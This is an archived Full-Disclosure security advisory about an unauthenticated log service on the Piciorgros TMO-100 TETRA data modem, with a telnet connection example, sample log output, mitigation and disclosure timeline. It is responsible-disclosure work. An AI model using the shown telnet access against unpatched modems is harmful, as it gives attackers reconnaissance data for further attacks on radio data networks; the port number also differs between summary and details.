lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <AS8PR04MB8819F0D363C8BEDEBB1DA2B0F435A@AS8PR04MB8819.eurprd04.prod.outlook.com>
Date: Thu, 14 Aug 2025 15:25:22 +0000
From: Georg Lukas <lukas@...solutions.de>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Piciorgros TMO-100: Unauthorized log data access

PDF advisory: https://rt-solutions.de/piciorgros/Piciorgros_TMO-100_IP-Logger_en.pdf

Classification
--------------

- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

- CVSS 4.0 Score: 5.3 / Medium
  CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

- CVSS 3.1 Score: 4.3 / Medium
  CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Affected systems
----------------

- Piciorgros TMO-100 V3/V4 with software version below 4.20
  (discovered in V3.72)

Summary
-------

The Piciorgros TMO-100 is a data modem for TETRA radio networks. It has
an undocumented system log service, which is provided without
authentication via TCP port 51986 on the LAN interface. This allows an
attacker with access to the LAN network to view some of the modem's
operating parameters, e.g. to plan further attacks. Starting with
software version 4.20, logger access is only enabled for a 15-minute
time window after a web login, preventing attacks during normal
operation.

Details
-------

During a penetration test carried out on behalf of a customer, a
Piciorgros TMO-100 data modem was part of the test scope. The
documentation describes the so-called "IPLog" feature for creating
support requests to the manufacturer. This feature can be accessed with
the IP Logger software. Under the hood, the software is connecting to
TCP port 51968 on the LAN interface, where the modem provides the
current system status and a live log data stream without authentication:

$ telnet 192.168.0.199 51968
Trying 192.168.0.199...
Connected to 192.168.0.199.
Escape character is '^]'.

[FFFF] | 13.02.25 10:43:25 02:37:37.43 | **** Piciorgros TMO-100 V3.72
(HW-Rev. 3) Build 1819* Release (Apr 7 2021, 10:35:03) - Logging started
****
[FFFE] | 13.02.25 10:43:25 02:37:37.43 | Serial number: ███ Options:
8001 Set24: 0080 Set25: 0001
[FFFE] | 13.02.25 10:43:25 02:37:37.43 | TETRA core SW versions:
Stack:0454, DSP:0456, MMI:F444
[F020] | 13.02.25 10:43:38 02:37:51.16 | TETRA CREG state change: 1 ->
99:1:0
…
[E000] | 13.02.25 10:44:34 02:38:46.63 | TETRA registration information:
1:0:0.
[F020] | 13.02.25 10:44:41 02:38:53.97 | PPP: Is up.
[E000] | 13.02.25 10:44:41 02:38:53.98 | PPP link is up in try 1. Own
IP: 10.14.42.31
…

The log shows the IP address of the modem in the TETRA network, which
can be used to carry out attacks on other devices in the TETRA data
network.

Impact
------

An attacker with LAN access to a TMO-100 modem can determine the
hardware and software version used as well as the IP address in the
TETRA data network and thus use the modem to scan neighboring IP address
ranges.

Mitigation for operators
------------------------

The modems should be updated to software version 4.20 or higher to limit
the impact.

Recommendations for the manufacturer
------------------------------------

Access should be authenticated in the same way as the web interface and,
if possible, encrypted using TLS. Implementation via web sockets or
other APIs as part of the web UI could be a viable alternative.

Timeline
--------

-   2025-02-13 Discovery of the vulnerability
-   2025-02-27 Notification to the manufacturer
-   2025-03-06 Confirmation of the vulnerability by the manufacturer
-   2025-03-11 Release of software version V4.20 by the manufacturer
-   2025-08-14 Publication of the vulnerability as part of responsible
    disclosure

-- 
Dr.-Ing. Georg Lukas
rt-solutions.de GmbH
Oberländer Ufer 190a
D-50968 Köln

Zentrale: (+49)221 93724 0
Web : www.rt-solutions.de
rt-solutions.de
experts you can trust.

Sitz der Gesellschaft: Köln
Eingetragen beim Amtsgericht Köln: HRB 52645
Geschäftsführer: Prof. Dr. Ralf Schumann, Dr. Stefan Schemmer


Download attachment "smime.p7s" of type "application/pkcs7-signature" (6514 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ